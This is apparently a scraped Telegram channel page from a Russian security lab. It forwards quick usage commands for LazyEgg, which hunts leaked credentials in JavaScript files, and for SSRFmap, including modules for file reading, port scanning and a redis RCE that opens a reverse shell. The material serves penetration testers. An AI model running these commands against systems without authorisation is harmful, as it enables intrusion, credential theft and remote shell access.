Лаборатория инновационных технологий и кибербезопасности компании AP Security. ( Laboratory of innovation technologies and cybersecurity )
Новости, события, мероприятия, технические обзоры
По вопросам сотрудничества:
@P1N_C0DE
Post #651
784
AP @ap_security
Showing posts older than #653 · Back to latest
Forwarded from Machete Hack
git clone https://github.com/schooldropout1337/lazyegg.git
python lazyegg.py http://localhost:8080
python lazyegg.py http://localhost:8080/js --js_scan --w wordlist.txt
cat jsurls.txt | xargs -I{} bash -c 'echo -e "\ntarget : {}\n" && python lazyegg.py "{}" --js_urls --domains --ips --leaked_creds'waybackurls vulnweb.com | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} bash -c 'python lazyegg.py "{}" --js_urls --domains --ips' > jsurls.log && cat jsurls.log | grep '\.' | sort -ule-jsurl.zip репозитория
Forwarded from K0N70R4

Forwarded from Machete Hack

git clone https://github.com/swisskyrepo/SSRFmap
cd SSRFmap/
pip3 install -r requirements.txt
python3 ssrfmap.py
git clone https://github.com/swisskyrepo/SSRFmap
docker build --no-cache -t ssrfmap .
docker run -it ssrfmap ssrfmap.py [OPTIONS]
docker run -it -v $(pwd):/usr/src/app ssrfmap ssrfmap.py
-r —> запрос, сохраненный из Burp Suite, -p —> тестируемый параметр, -m —> используемые модулиpython ssrfmap.py -r request.txt -p url -m readfiles,portscan
redis, который сразу пробует проэксплуатировать RCE, где параметры LHOST и LPORT служат для создания reverse shellpython ssrfmap.py -r request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
